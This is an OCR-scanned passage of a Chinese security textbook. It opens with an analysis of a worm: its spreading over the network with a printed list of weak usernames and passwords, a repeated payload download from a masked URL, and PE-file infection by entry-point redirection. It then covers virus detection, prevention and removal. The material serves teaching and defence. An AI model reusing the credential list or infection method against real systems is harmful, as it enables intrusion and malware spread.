(2) 传染 指定 IP 地 址 的 计算 机 。 病 毒 下 载 文 件 “http://union. itlearner. com/ip/ 
getip. asp”, 同 时 在 其 中 搜索 "input name 二 \"IP\” 来 获取 IP 地 址 ,然后 利用 用 户 名 和 密码 
憩 尝试 将 文件 psexec. exe 和 server. exe 写 和 人 该 IP 地 址 的 计算 机 中 ,并 运行 上 述 两 个 可 执 
人 

(3) 传染 当前 连接 的 计算 机 。 病 毒 通过 调用 一 系列 函数 (GetTcpTable、GetUdpTable 
等 ) 得 到 连接 到 当前 计算 机 的 IP 地 址 ,然后 利用 用 户 名 和 密码 簿 尝试 将 文件 psexec. exe 和 
server. exe 写 人 该 IP 地 址 的 计算 机 中 ,并 运行 上 述 两 个 可 执行 文件 。 

其 中 ,用 户 名 和 密码 憩 如 下 。 
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用 户 名 : administrator admin 、guest alex、home love, user, game、 movie, time、yeah、 
money、xpuser。 

密码 : NULL password、123456 、qwerty abc123 .memory、12345678、88888、5201314、 
1314520 .asdfgh .angel asdf、baby、woaini。 

工作 线程 4: 病毒 每 隔 1 秒 会 从 目录 http://www. XXXXX. cn/jj/ 尝 试 循环 下 载 文件 
svchOst. exe 到 本 地 计算 机 目录 %system32% 下 ,同时 运行 该 文件 。 

8. 病毒 的 传染 代码 


在 病毒 体 中 包括 了 传染 代码 ,可 是 病毒 自己 并 没有 调用 传染 代码 。 该 传染 代码 中 包含 
API 地 址 硬 编码 等 诸多 问题 ,在 执行 时 会 暴露 出 问题 。 在 传染 代码 中 保护 以 下 操作 。 

病毒 首先 将 自身 复制 到 本 机 目录 % system32\ drivers\ 中 ,然后 将 文件 副本 改名 为 
Svchost. exe。 


病毒 将 自身 复制 到 以 下 目录 ,名 称 为 随机 文件 名 . exe。 


% System32\drivers\、% system32\dllcache\\ % system32\IME\ 
C:\Program Files\Common Files\Microsoft Shared\ 、 
C:\Program Files\Internet Explorer\Connection Wizard\ 、 
C:\Program Files\Windows Media Player\、 
C:\WINDOWS\addins\ 、 

C:\WINDOWS\ systen\ 


病毒 遍历 本 机 的 固定 逻辑 硬盘 ,对 硬盘 中 所 有 目录 进行 传染 ,但 排除 保护 如 下 字符 串 的 
目录 : Windows Media Player、OutlookExpress、Internet Explorer、NetMeeting 、ComPlus 
Applications\Messenger、WINNT 、Documents and Settings\、System Volume Information、 
Recycled .Windows NT、WindowsUpdate Messenger, Microsoft Frontpage, Movie Maker、 
Windows。 病 毒 只 传染 后 级 名 为 . exe 的 PE 可 执行 文件 ,而 不 传染 其 他 类 型 的 文件 。 病 毒 
传播 时 ,在 被 传染 文件 的 代码 节 末 尾 , 内 容 为 0 的 位 置 (为 文件 对 齐 补 的 ) 嵌 入 病毒 代码 , 同 
时 将 PE 头 中 入 口 地 址 改 为 指向 病毒 代码 。 在 传播 的 病毒 代码 中 ,病毒 调用 函数 
CreateProcessA( 该 函数 地 址 为 病毒 传播 时 幅 入 的 硬 编码 ) 运 行路 径 *C;\ WINDOWS\ 
system32\drivers\” 下 的 可 执行 文件 mmaou. exe( 病 毒 传 播 时 嵌入 ,文件 为 病毒 传播 时 复制 
的 病毒 自身 ) ,然后 通过 记录 的 原 人 口 地 址 跳 转 回 原 程 序 正 常 入 口 地 址 运行 。 

安全 建议 如 下 。 

(1) 在 计算 机 系统 中 安装 并 运行 正版 反 病毒 软件 ,个 人 防火 墙 和 卡 卡 上 网 安全 助手 ,并 
及 时 升级 软件 。 

(2) 使 用 “系统 安全 漏洞 扫描 ”, 及 时 打 好 补丁 ,以 弥补 操作 系统 的 漏洞 。 

(3) 不 浏览 非法 网 站 ,拒绝 下 载 安装 可 疑 的 插件 。 

(4) 拒绝 接收 E-mail、QQ、MSN 等 传 来 的 可 疑 文件 。 

(5) 上 网 时 启动 反 病毒 软件 的 实时 监控 功能 。 

(6) 将 QQ、 网 银 、 网 游 等 重要 软件 添加 到 “账号 保险 柜 ” 中 ,能 够 有 效 地 保护 用 户 密 码 
的 安全 。 
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11.3 计算 机 病毒 的 检测 与 防范 


11.3.1 计算 机 病毒 的 检测 


从 前 面 几 节 的 介绍 中 ,可 以 发 现 计算 机 病毒 的 隐蔽 性 非常 强 : 病毒 不 发 作 时 ,计算 机 没 
有 任何 的 异常 ; 病毒 一 旦 发 作 , 轻 则 导致 计算 机 速度 减 慢 , 重 则 导致 计算 机 系统 崩溃 。 因 
此 ,在 日 常 的 学 习 和 工作 中 ,计算 机 用 户 有 必要 了 解 计 算 机 系统 中 是 否 存在 病毒 。 普 通 计算 
机 用 户 可 以 根据 下 面 的 现象 来 辨别 计算 机 系统 中 是 否 存在 病毒 。 

(1) 计算 机 系统 的 启动 速度 明显 变 慢 ,并 且 计 算 机 出 现 自 动 重启 的 异常 现象 。 

(2) 计算 机 在 工作 过 程 中 ,无 缘 无 故 出 现 死机 的 异常 现象 。 

(3) 计算 机 系统 桌面 上 的 图 标 显示 异常 。 

(4) 计算 机 系统 桌面 上 出 现 了 异常 的 摘要 ,如 奇怪 的 提示 信息 、 异 样 的 字符 等 。 

(5) 计算 机 运行 某 一 正版 的 软件 时 ,系统 经 常 提示 内 存 空间 不 足 。 

(6) 计算 机 硬盘 中 存储 的 文件 遭 到 破坏 ,文件 中 的 数据 被 非法 修改 甚至 丢失 。 

(7) 计算 机 的 音箱 无 缘 无 故地 发 出 奇怪 的 声音 。 

(8) 计算 机 系统 不 能 够 识别 存在 的 固定 硬盘 。 

(9) 你 的 朋友 抱怨 你 总 是 给 他 发 送 包 含 奇 怪 信 息 的 邮件 ,或 你 的 电子 邮箱 中 出 现 了 大 
量 的 来 历 不 明 的 电子 邮件 。 

(10) 计算 机 系统 连接 的 打印 机 的 速度 明显 变 慢 , 或 者 打印 出 一 些 奇怪 的 字符 。 

(11) 计算 机 系统 中 存储 的 文件 并 没有 被 修改 但 是 文件 长 度 有 所 增加 。 

(12) 计算 机 系统 不 能 正常 地 存储 数据 和 文件 。 

由 于 病毒 对 于 信息 技术 领域 的 严重 威胁 ,世界 上 有 专门 从 事 对 抗 病毒 的 公司 和 组 织 。 
他 们 提供 较为 成 熟 的 病毒 查 杀 软件 ,可 以 很 容易 地 发 现 恶意 代码 的 踪迹 。 这 种 病毒 查 杀 软 
件 一 般 都 是 采用 基于 特征 的 手段 检测 病毒 的 。 通 过 软件 自动 化 地 发 现 病毒 的 还 有 基于 校 验 
和 的 检测 方式 。 

作为 代码 的 病毒 ,其 本 身 是 一 个 二 进 制 串 。 无 论 是 否 恶意 ,不 同 的 代码 必然 是 不 同 的 二 
进 制 串 ,那么 也 必然 可 以 找到 作为 其 特征 而 唯一 确定 该 二 进 制 串 的 子 串 或 子 序列 。 子 串 与 
子 序列 都 是 原始 串 的 一 段 内 容 , 它 们 的 不 同 在 于 : 子 串 在 原始 中 是 连续 出 现 的 ;而 子 序列 
中 的 内 容 则 可 以 属于 原始 串 中 相距 甚 远 的 不 同 部 分 ,只 是 内 容 在 子 序列 中 出 现 的 先后 顺序 
和 原始 串 中 的 先后 顺序 一 致 。 

专门 从 事 反 病毒 的 公司 和 组 织 , 会 有 专人 在 互联 网 和 各 种 系统 中 寻找 未 知 的 病毒 的 踪 
迹 。 一 旦 通过 分 析 , 发 现 了 新 的 病毒 ,除了 要 和 弄 清楚 其 功能 \ 原 理 和 清除 方法 外 ,还 要 确定 可 
以 唯一 标识 该 病毒 的 特征 子 串 或 子 序列 。 

新 发 现 的 病毒 ,包括 特征 子 串 或 子 序列 ,以 及 清除 方法 之 类 的 信息 ,需要 更 新 到 选用 该 
公司 或 组 织 的 病毒 查 杀 软 件 产品 的 计算 机 上 的 防 病毒 软件 的 病毒 数据 库 中 。 以 便 病毒 查 杀 
软件 在 系统 防护 和 病毒 查 杀 过 程 中 能 够 及 时 发 现 和 应 对 新 发 现 的 病毒 。 目 前 ,一 般 都 由 各 
个 用 户 计算 机 上 运行 的 病毒 查 杀 软件 联网 自动 完成 病毒 数据 库 内 容 的 更 新 。 
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基于 特征 的 病毒 检测 ,只 能 发 现 已 知 的 病毒 ,为 了 发 现 新 产生 的 病毒 ,需要 反 病 毒 领域 
的 工作 人 员 做 大 量 的 工作 。 但 是 ,这 种 检测 方法 可 以 确定 究竟 感染 了 哪 种 病毒 ,并 且 能 够 清 
楚 地 知道 如 何 清除 它 。 

基于 校 验 和 的 病毒 检测 主要 是 基于 数据 完整 性 检测 的 思想 。 病 毒 总 是 有 自己 的 代码 实 
体 , 并 且 需 要 存储 于 被 感染 系统 的 某 个 位 置 上 。 如 果 有 办 法 记录 系统 中 每 个 文件 的 具体 大 
小 内容, 系统 关键 区 域 的 具体 数据 ,每 次 查看 系统 时 ,如 果 发 现 某 处 数据 的 样 貌 与 其 应 有 的 
样 貌 不 一 致 , 那 就 意味 着 数据 的 完整 性 被 破坏 了 。 这 种 破坏 有 可 能 就 是 病毒 造成 的 ,或 者 是 
因为 病毒 代码 寄居 于 此 ,或 者 是 病毒 的 表现 模块 的 破坏 效果 。 通 过 对 系统 中 数据 的 完整 性 
检测 可 能 发 现 病毒 的 痕迹 。 

逐个 比特 的 完全 记录 数据 应 有 样 貌 代价 比较 大 ,仅仅 从 为 了 发 现 完整 性 破坏 的 角度 而 
言 , 设 置 校 验 和 是 一 种 好 的 选择 。 常 见 的 校 验 和 手段 有 循环 宛 余 码 .hash 值 等 , 校 验 和 信息 
可 以 存储 在 数据 文件 ,内存 或 系统 特定 位 置 上 。 当 然 ,病毒 可 以 在 自己 的 隐藏 模块 中 加 入 伪 
造 校 验 和 的 逻辑 ,目前 最 完善 的 校 验 手段 是 数字 签名 , 极 难 伪造 ,在 一 些 系统 中 ,至 少 比较 关 
键 的 系统 文件 都 采用 数字 签名 的 手段 来 保证 对 自身 完整 性 破坏 的 及 时 发 现 。 

使 用 校 验 和 进行 完整 性 检验 可 以 发 现 由 于 病毒 等 原因 而 造成 的 完整 性 破坏 。 对 比 基 于 
特征 的 病毒 检测 ,基于 校 验 和 的 检测 无 法 确定 是 哪 种 病毒 侵入 ,甚至 无 法 确定 是 否 是 病毒 侵 
入 ; 但 是 相对 于 只 能 检测 出 知晓 已 知 病毒 人 侵 的 基于 特征 的 检测 , 校 验 和 检测 可 以 发 现 未 
知 病毒 造成 的 数据 改变 。 


11.3.2 计算 机 病毒 的 防范 


普通 的 计算 机 用 户 可 以 注意 以 下 的 方面 ,来 有 效 地 防范 计算 机 病毒 。 

(1) 在 本 地 的 计算 机 上 安装 正版 的 反 病毒 软件 。 计 算 机 用 户 可 以 通过 电话 购买 .网 上 
购买 ,也 可 以 到 软件 经 销 商 那里 购买 。 

(2) 利用 安全 监视 软件 监视 浏览 器 的 运行 。 安 全 监视 软件 可 以 防止 本 地 计算 机 的 浏览 
器 被 网 络 黑客 恶意 修改 ,非法 安装 恶意 插件 。 

(3) 开启 防火 墙 软件 或 反 病毒 软件 附带 的 防火 墙 。 防 火 墙 开 启 后 ,网 络 外 部 的 黑客 将 
无 法 突破 防火 墙 构筑 的 坚固 防线 ,人 侵 本 地 的 计算 机 。 计 算 机 用 户 可 以 根据 需要 开启 不 同 
保护 级 别 的 防火 墙 ,这 里 需要 说 明 的 是 , 较 高 级 别 的 防火 墙 保护 会 禁止 一 些 常用 的 服务 ,如 

(4) 及 时 更 新 病毒 库 。 为 了 快速 检测 到 新 型 计算 机 病毒 或 病毒 的 变种 ,计算 机 用 户 应 
该 定期 更 新 反 病毒 软件 的 病毒 库 。 随 着 计算 机 应 用 领域 的 不 断 拓展 ,目前 存在 的 计算 机 病 
毒 数 量 已 达 几 万 种 。 而 且 每 月 都 有 几 十 种 新 型 病毒 问世 ,这 些 新 型 病毒 严重 地 影响 到 用 户 
计算 机 系统 的 安全 。 

(5) 培养 使 用 文件 前 先 检测 病毒 的 好 习惯 。 随 着 计算 机 网 络 的 不 断 普 及 , 越 来 越 多 的 
人 习惯 从 网 络 上 下 载 文件 。 许 多 计算 机 用 户 在 网 络 上 下 载 文件 后 直接 打开 或 安装 使 用 ,这 
样 做 危险 性 很 大 ,因为 网 络 上 的 资料 鱼龙混杂 ,用 户 下 载 的 资料 很 可 能 包含 病毒 。 为 了 保证 
计算 机 系统 的 安全 ,用 户 下 载 文件 后 一 定 要 先 检 测 病毒 ,然后 再 使 用 此 文件 。 另 外 ,现在 U 
盘 的 体积 小 巧 ,使 用 方便 , 深 受 广大 计算 机 用 户 的 喜爱 。 计算机 用 户 最 好 不 要 使 用 U 盘 的 
自动 播放 功能 ,另外 在 打开 U 盘 前 一 定 要 先 检测 病毒 ,防止 U 盘 上 的 病毒 传播 到 本 地 的 计 
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算 机 。 

(6) 并 慎 使 用 盗版 软件 。 虽然 软件 企业 打击 盗版 的 力度 不 断 地 加 大 ,但 是 受到 利益 的 
驱使 盗版 活动 屡 禁 不 绝 。 资 版 经 营 者 只 顾 经 济 利益 ,他 们 在 制作 盗版 光盘 时 ,不 会 仔细 地 检 
测 光盘 中 的 软件 是 否 感 染 了 计算 机 病毒 。 因 此 ,广大 的 计算 机 用 户 应 该 自觉 地 抵制 盗版 软 
件 , 最 好 使 用 正版 的 软件 产品 。 

(7) 专 盘 专用 。 这 项 措施 主要 是 针对 办 公 室 的 用 户 而 言 的 。 对 大 多 数 办 公 室 的 工作 人 
员 来 说 ,相互 借用 U 盘 是 再 普通 不 过 的 事情 了 。 这 样 做 既 可 以 联络 同事 的 感情 ,又 方便 了 
文件 的 传递 。 但 是 ,这 种 行为 可 能 导致 病毒 以 U 盘 为 媒介 ,在 不 同 的 计算 机 之 间 进 行 传播 。 
为 了 防止 病毒 的 交叉 感染 ,净化 办 公 环境 ,办 公 室 的 工作 人 员 应 该 做 到 U 盘 的 专 盘 专用 。 

(8) 及 时 备份 。 计 算 机 用 户 在 计算 机 上 安装 了 操作 系统 及 其 相关 应 用 软件 后 ,应 该 及 
时 对 系统 进行 备份 。 常 用 的 系统 备份 软件 有 Ghost 软件 。 此 外 ,对 计算 机 中 重要 的 数据 文 
件 要 及 时 备份 ,防止 数据 破坏 后 造成 灾难 性 的 损失 。 因 此 ,及 时 备份 操作 系统 和 重要 的 数据 
文件 对 预防 计算 机 病毒 的 破坏 有 着 重要 的 意义 。 

(9) 关闭 未 使 用 和 不 需要 的 服务 和 进程 。 它 们 浪费 了 宝贵 的 系统 资源 ,降低 了 整 台 计 
算 机 的 工作 效率 ,还 有 可 能 被 狭 独 的 黑客 们 利用 。 

(10) 及 时 修补 系统 安全 漏洞 。 黑 客 们 往往 通过 操作 系统 的 安全 漏洞 来 发 动 网 络 攻击 ， 
黑客 攻击 的 首要 任务 就 是 发 现 和 利用 安全 漏洞 。 正 如 世界 上 没有 十 全 十 美的 人 一 样 , 软 件 
也 不 可 能 做 到 绝对 的 完美 。 换 句 话 说 ,软件 总 是 有 安全 漏洞 的 。 修 补 操作 系统 安全 漏洞 有 
以 下 4 种 途径 : 利用 瑞星 漏洞 扫描 程序 修补 ; @ 使 用 瑞星 卡 卡 扫描 和 更 新 操作 系统 漏洞 ; 
@ 使 用 操作 系统 自 带 程序 修补 ,更 新 补丁 ; @ 利 用 Windows 更 新 下 载 器 更 新 补丁 。 此 外 ， 
除了 对 操作 系统 的 漏洞 进行 修补 外 ,计算 机 用 户 还 需要 实时 监视 计算 机 系统 的 运行 情况 ,以 
便 及 早 地 发 现 黑客 人 侵 计 算 机 系统 的 非法 活动 。 


11.3.3 计算 机 病毒 的 清除 


1. 利用 杀毒 软件 清除 计算 机 病毒 

国内 常见 的 反 病毒 软件 往往 以 病毒 的 特征 标识 码 为 基础 针对 具体 的 病毒 实施 检测 ， 
这 些 软件 不 能 准确 地 检测 已 知 病毒 的 变种 和 未 知 的 病毒 。 换 句 话说 ,国内 常见 的 病毒 
检测 软件 存在 以 下 缺陷 : 从 未 知 的 病毒 产生 到 反 病 毒 企 业 接 到 用 户 针对 该 病毒 的 举报 ,更 
新 软件 版 本 ,中间 存在 一 段 时间 差 。 在 这 段 不 太 长 的 时 间 中 ,用 户 的 计算 机 极 易 受 到 该 新 型 
病毒 的 危害 。 虽 然 国 内 常见 的 杀毒 软件 能 够 有 效 地 控制 新 型 病毒 的 传播 范围 ,但 是 它们 的 
检测 目标 往往 是 已 知 的 病毒 ,这 种 被 动 式 的 病毒 检测 技术 使 得 新 型 病毒 的 检测 总 是 落后 于 
新 型 病毒 的 产生 。 针 对 这 些 反 病毒 软件 的 整 端 , 反 病 毒 的 专家 研究 出 一 种 灵活 开放 的 病毒 
检测 技术 一 一 “启发 式 ”病毒 检测 机 制 ,这 种 技术 能 够 通过 模拟 新 型 病毒 的 功能 来 识别 新 出 
现 的 计算 机 病毒 。 启 发 式 病毒 检测 技术 代表 着 未 来 反 病毒 技术 的 发 展 趋势 ,这 种 技术 包含 
了 一 些 人 工 智能 的 特点 , 即 具 备 一 定 的 通用 性 不 依赖 于 软件 的 升级 。 在 新 型 病毒 不 断 涌现 
的 今天 ,这 种 新 技术 的 应 用 对 计算 机 病毒 防御 来 说 具有 重要 的 意义 。 应 用 这 种 新 技术 的 典 
型 软件 产品 有 微 点 主动 防御 软件 (东方 微 点 公司 研发 ) 和 卡巴 斯 基 反 病毒 软件 (卡巴 斯 基 公 
司 研发 )。 

一 般 来 说 ,计算 机 用 户 使 用 杀毒 软件 能 够 清除 本 地 计算 机 上 的 已 知 类 型 的 病毒 。 在 查 
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杀 病 毒 时 ,计算 机 用 户 有 必要 重新 启动 计算 机 ,在 安全 模式 下 查 杀 本 地 计算 机 上 的 病毒 ,这 
样 才能 够 取得 较 好 的 清除 效果 。 如 果 普 通 的 反 病 毒 软 件 的 杀毒 效果 不 佳 ,计算 机 用 户 可 以 
上 网 下 载 针 对 性 较 强 的 病毒 专 杀 工具 来 清除 特殊 类 型 的 病毒 。 如 果 上 面 的 病毒 清理 方式 都 
不 能 奏效 ,用 户 只 能 通过 格式 化 计算 机 硬盘 重新 安装 操作 系统 来 彻底 清除 本 地 计算 机 上 的 
恶劣 病毒 。 

2. 格式 化 计算 机 硬盘 重新 安装 操作 系统 

格式 化 计算 机 硬盘 重新 安装 操作 系统 是 最 彻底 的 病毒 清理 方法 。 在 格式 化 前 ,用 户 一 
定 要 仔细 检查 硬盘 中 的 数据 资料 ,备份 重要 的 数据 资料 ,否则 在 格式 化 硬盘 的 过 程 中 ,硬盘 
上 的 数据 资料 会 遭 到 彻底 的 破坏 。 另 外 ,计算 机 用 户 应 该 注意 尽量 对 硬盘 进行 高 级 格式 化 ; 
不 要 轻易 地 低级 格式 化 硬盘 。 因 为 低级 格式 化 会 缩短 硬盘 的 使 用 寿命 ,属于 一 种 损耗 性 
操作 。 

3. 手动 清除 计算 机 病毒 

手动 清除 计算 机 病毒 技术 性 强 , 要 求 操 作者 熟悉 计算 机 指令 和 计算 机 操作 系统 ,一 般 只 
能 由 专业 的 软件 工程 师 来 做 。 由 于 这 种 方法 专业 性 很 强 , 这 里 就 不 多 介绍 了 ,如 果 读 者 感 兴 
趣 , 可 以 参考 相关 的 技术 类 书籍 。 


11.3.4 网 络 病毒 的 防范 措施 


网 络 病毒 防范 涉及 的 问题 很 多 ,不仅 包括 技术 上 的 更 新 间 题 ,而 且 还 包括 人 们 强化 防范 
网 络 病毒 意识 的 问题 ,此 外 网 络 病毒 防范 的 制度 建设 也 起 到 关键 的 作用 。 因 此 ,大 家 可 以 从 
以 下 几 个 方面 来 加 强 网 络 病毒 的 防范 。 

1， 加 大 宣传 力度 ,强化 公众 的 信息 安全 意识 

所 谓 信息 安全 意识 ,是 指 在 上 网 过 程 中 ,人 们 能 够 明确 信息 安全 的 重要 性 ,能 够 有 意识 
地 发 现 危 害 信息 安全 的 现象 和 行为 ,能 够 自觉 地 维护 网 络 信息 安全 。 强 化 公众 的 信息 安全 
意识 ,就 是 要 让 广大 群众 认识 到 只 有 保证 信息 的 安全 性 网 络 才能 够 正常 地 运转 ,网 络 信息 如 
果 缺 乏 安全 性 公民 自身 的 权益 乃至 国家 的 利益 都 无 法 得 到 切实 的 保障 。 为 此 ,一 是 要 通过 
现代 传媒 ,向 广大 群众 宣传 信息 安全 常识 ,提高 公民 的 信息 安全 水 平 。 二 是 要 积极 开展 信息 
安全 培训 工作 ,培养 合格 的 专门 人 才 ,确保 信 息 安 全 防范 技术 的 先进 性 。 三 是 要 大 力 开展 信 
息 安全 策略 研究 ,明确 安全 责任 ,增强 上 网 人 员 的 责任 意识 。 

2. 运用 多 种 网 络 安全 技术 ,为 公众 信息 设置 安全 保障 

当前 ,广泛 使 用 的 网 络 安 全 技术 包括 网 络 防 火 墙 .物理 设施 隔离 及 虚拟 专用 网 3 个 方 
面 。 防 火 墙 技术 能 够 实现 单位 内 部 网 络 和 单位 外 部 网 络 的 入 侵 隔 离 。 应 用 防火 墙 技术 ,一 
方面 可 以 抵御 来 自 互联 网 的 非法 入 侵 ; 另 一 方面 可 以 禁止 单位 内 部 的 计算 机 用 户 从 内 部 网 
段 发 动 针对 互联 网 服务 器 的 攻击 。 电 子 政务 网 站 与 Internet 之 间 要 设置 防火 墙 。 网 络 安全 
人 员 要 及 时 下 载 最 新 的 补丁 程序 ,做 好 内 部 网 络 维护 工作 ; 同时 加 强 对 单位 内 部 上 网 用 户 
的 监督 发现 信息 安全 问题 及 时 整改 。 政 府 部 门 用 户 使 用 计算 机 网 络 必须 要 实现 内 外 网 的 
物理 隔离 。 要 运用 先进 的 虚拟 专用 网 技术 ,让 人 民 群 众 通过 互联 网 就 可 以 安全 地 对 各 级 政 
府 的 电子 政务 系统 进行 远程 访问 。 与 此 同时 ,要 密切 关注 电子 政务 系统 的 安全 问题 ,如 操作 
系统 安全 ,数据 库 系统 安全 及 网 络 服务 器 的 安全 。 
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3. 运用 数据 加 密 技术 ,加 强 网 络 通 信安 全 

数字 证 书 为 电子 政务 系统 提供 了 真实 的 ,完整 的 ,机密 的 和 不 可 否认 的 信息 ,保证 了 系 
统 中 各 种 业务 的 顺利 开展 。 在 业务 系统 中 建立 有 效 的 权限 管理 机 制 、 授 权 监督 机 制 和 严格 
的 责任 追究 机 制 。 当 前 要 加 强身 份 认证 ,数据 完整 性 .数据 加 密 、 数 字 签 名 等 工作 。 针 对 电 
子 政务 系统 中 的 各 种 敏感 信息 要 进行 加 密 处 理 , 并 且 在 网 络 传输 的 过 程 中 采用 加 密 传输 ,以 
防止 网 络 黑客 窃 密 。 只 有 通过 了 身份 认证 的 网 络 用 户 才 能 够 登录 电子 政务 系统 ,此 用 户 在 
电子 政务 系统 中 只 能 完成 符合 自身 权限 的 操作 。“ 在 涉及 多 个 对 等 实体 之 间 的 交互 认证 时 ， 
应 采用 基于 PKI 技术, 借助 第 三 方 (CA) 颁 发 的 数字 证 书 数字 签名 来 确认 彼此 身份 。 为 了 
保证 我 国 的 网 络 信息 安全 ,我 国 应 该 使 用 自主 研发 的 安全 产品 ,不 能 单纯 依赖 国外 的 先进 技 
术 。 政 府 应 该 鼓励 民营 资本 进入 数字 安全 技术 领域 ,以 提高 我 国信 息 企业 的 融资 能 力 , 从 而 
进一步 提高 政府 防范 网 络 病毒 的 水 平 。 

4. 加 强 信息 安全 技术 管理 ,切实 做 到 安全 使 用 网 络 

一 是 要 控制 好 单位 内 部 网 络 共享 资源 的 共享 范围 ,在 单位 内 部 子 网 中 尽量 不 要 开放 共 
享 目录 。 单 位 中 有 些 用 户 出 于 工作 的 要 求 需 要 经 常 交换 信息 ,他 们 和 希望 开放 某 些 共享 目录 。 
单位 的 网 络 管理 人 员 在 开放 共享 目录 的 同时 应 该 分 配给 这 些 特 殊 用 户 相 应 的 口令 , 即 只 有 
通过 口令 认证 的 用 户 才能 访问 共享 目录 中 的 数据 。 二 是 对 于 涉及 秘密 信息 的 服务 器 ,用 户 
在 使 用 过 程 中 应 该 禁止 一 些 不 常用 的 网 络 服务 ,同时 及 时 备份 数据 库 中 的 数据 。 三 是 切实 
保证 传输 媒体 的 安全 。 传 输 媒 体 的 安全 包括 传输 媒体 中 传播 的 数据 的 安全 性 以 及 传输 媒体 
本 身 的 安全 性 。 考 虑 到 计算 机 系统 通过 电磁 辐射 的 截取 距离 可 达到 几 百 米 乃 至 上 千 米 , 因 
此 要 避免 系统 信息 在 空间 上 的 扩散 。 为 了 达到 以 上 目标 ,用 户 可 以 对 计算 机 系统 采取 一 定 
的 物理 防护 措施 ,减少 或 干扰 扩散 出 去 的 空间 信和 号。 采取 以 上 多 种 措施 ,可 以 为 政府 的 网 络 
安全 提供 可 靠 的 保障 。 

5. 健全 网 络 安全 制度 ,强化 网 络 安全 

常言 道 ,“ 三 分 技术 .七 分 管理 ”"。 先 进 的 网 络 安全 技术 .结合 完备 的 网 络 安 全 管理 制度 
才能 为 电子 政务 提供 安全 保障 。 网 络 安全 制度 包括 安全 组 织 建设 安全 制度 建设 及 人 员 安 
全 教育 3 个 层次 的 内 容 。 安 全 组 织 建设 的 含义 是 健全 网 络 信息 安全 管理 的 机 构 。 应 该 致力 
于 建立 覆盖 全 社会 的 网 络 安全 防范 体系 ,公安 机 关 应 该 成 为 这 个 体系 的 中 心 ; 各 个 单位 的 
安全 领导 小 组 作为 体系 的 重点 ; 计算 机 系统 安全 员 作 为 体系 的 基础 ; 整个 体系 以 保护 计算 
机 信息 系统 安全 为 宗旨 。 要 落实 网 络 信息 安全 责任 制 。 单 位 的 各 个 部 门 必须 设置 网 络 安 全 
负责 人 ,专门 保障 本 部 门 计算 机 网 络 的 安全 运行 。 为 了 有 效 地 打击 网 络 病毒 犯罪 ,应 加 快 
“网 上 警察 队伍 建设 ,公安 部 门 应 吸纳 一 大 批 政 治 素质 好 业务 能 力 强 的 信息 安全 人 才 ,充实 
网 上 警察 队伍 ,进一步 提高 公安 部 门 的 快速 反应 能 力 、 侦 察 能 力 与 追踪 水 平 , 以 适应 打击 网 
络 病毒 和 网 上 犯罪 的 需要 。 各 个 单位 要 努力 健全 网 络 安全 的 规章 制度 ,同时 定期 地 检查 安 
全 规章 制度 的 执行 情况 。 各 个 单位 要 及 时 收集 相关 部 门 的 网 络 安全 记录 ,及 时 发 现 安全 漏 
洞 并 提出 整改 措施 ,要 定期 向 安全 监督 机 关 报告 本 系统 的 网 络 安全 情况 。 各 单位 要 强化 对 
计算 机 操作 人 员 的 安全 教育 和 监督 ,加 强 密码 口令 和 授权 的 管理 ,重视 数据 库 系统 的 维护 
工作 ,禁止 在 网 上 下 载 非法 软件 等 。 
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11.4 ”软件 防 病毒 技术 


11.4.1 计算 机 杀毒 软件 的 运作 机 制 


反 病 毒 专家 对 各 种 病毒 检测 方法 进行 加 工 和 整合 ,提出 了 一 系列 的 核心 反 病毒 技术 ,如 
“虚拟 机 脱 壳 引擎 ”启发 式 杀毒 ”主动 防御 ”及 * 云 查 杀 ? 等 。 各 类 杀毒 软件 产品 也 摆脱 了 单 
纯 的 病毒 特征 扫描 检测 ,发 展 成 为 基于 病毒 家 族 体 系 的 命名 规则 、 基 于 多 位 循环 校 验 和 扫描 
机 理 , 采 用 启发 式 智能 代码 分 析 模 块 动 态 数据 还 原 模块 、 内 存 解 毒 模块 、 自 身 免疫 模块 等 多 
种 先进 反 病毒 技术 并 用 的 复合 软件 产品 。 下 面 分 析 一 下 多 种 反 病毒 技术 之 间 的 协同 问题 。 

从 病毒 检测 的 角度 来 说 ,病毒 特征 库 对 基于 病毒 的 特征 扫描 技术 而 言 是 必 备 的 ,因为 它 
能 够 准确 地 检测 出 现 有 的 病毒 ,但 是 这 种 技术 又 要 求 及 时 更 新 特征 库 。 对 计算 机 系统 来 说 ， 
病毒 实时 监控 技术 也 是 必需 的 ,这 种 技术 能 够 有 效 地 防御 新 型 的 病毒 ,但 是 这 种 技术 的 误 检 
率 较 高 ,白白 地 消耗 了 系统 资源 ,也 会 对 计算 机 系统 的 工作 产生 不 利 的 影响 。 考 虑 到 以 上 因 
素 , 反 病毒 企业 大 多 在 现 有 技术 的 基础 上 进行 改进 ,在 杀毒 软件 中 应 用 最 新 的 网 络 技术 ,来 
进一步 提高 检测 率 ,降低 误 检 率 和 系统 消耗 。 

自然 界 中 的 病毒 通常 通过 外 部 环境 侵入 人 体内 部 ,病毒 人 侵 计 算 机 的 机 理 和 自然 界 中 
的 病毒 人 侵 人 体 的 机 理 相似 。 在 网 络 莲 勃 发 展 的 今天 ,计算 机 遭受 各 种 人 侵 的 根源 也 是 来 
自 外 部 环境 ,这 里 所 提 到 的 外 部 环境 包括 移动 存储 设备 (U 盘 和 移动 硬盘 ) 与 网 络 ,而 且 计 
算 机 通过 网 络 感染 病毒 的 情况 居多 。 由 此 可 见 ,防范 计算 机 病毒 的 基本 宗旨 为 ,尽量 将 病毒 
隔绝 在 计算 机 系统 之 外 , 即 在 病毒 人 侵 计算 机 之 前 就 将 其 消灭 掉 , 这 样 就 不 必 在 病毒 入侵 计 
算 机 后 在 本 机 全 盘查 杀 病毒 了 。 各 大 反 病 毒 企业 贯彻 了 这 一 宗旨 ,在 近 几 年 发 布 的 安全 套 
装 中 都 集成 了 防火 墙 。 但 是 要 把 病毒 完全 隔绝 在 计算 机 之 外 , 仅 靠 防火 墙 的 防护 是 不 够 的 ， 
计算 机 系统 还 要 安装 其 他 的 病毒 检测 引擎 ,这些 引 擎 会 对 来 自 外 部 的 可 疑 举动 实施 检测 。 
病毒 检测 引擎 会 进行 以 下 方面 的 检测 : 病毒 特征 值 的 核对 、 基 于 行为 检测 的 启发 式 扫描 和 
“ 云 查 杀 ”。 所 谓 “ 云 查 杀 ”, 就 是 利用 大 量 的 客户 机 对 网 络 中 软件 行为 的 异常 情况 进行 监测 ， 
获取 网 络 病毒 的 最 新 信息 并 上 报到 服务 器 进行 自动 分 析 和 处 理 ,再 把 病毒 的 解决 方案 分 发 
到 每 一 台 客户 机 。 

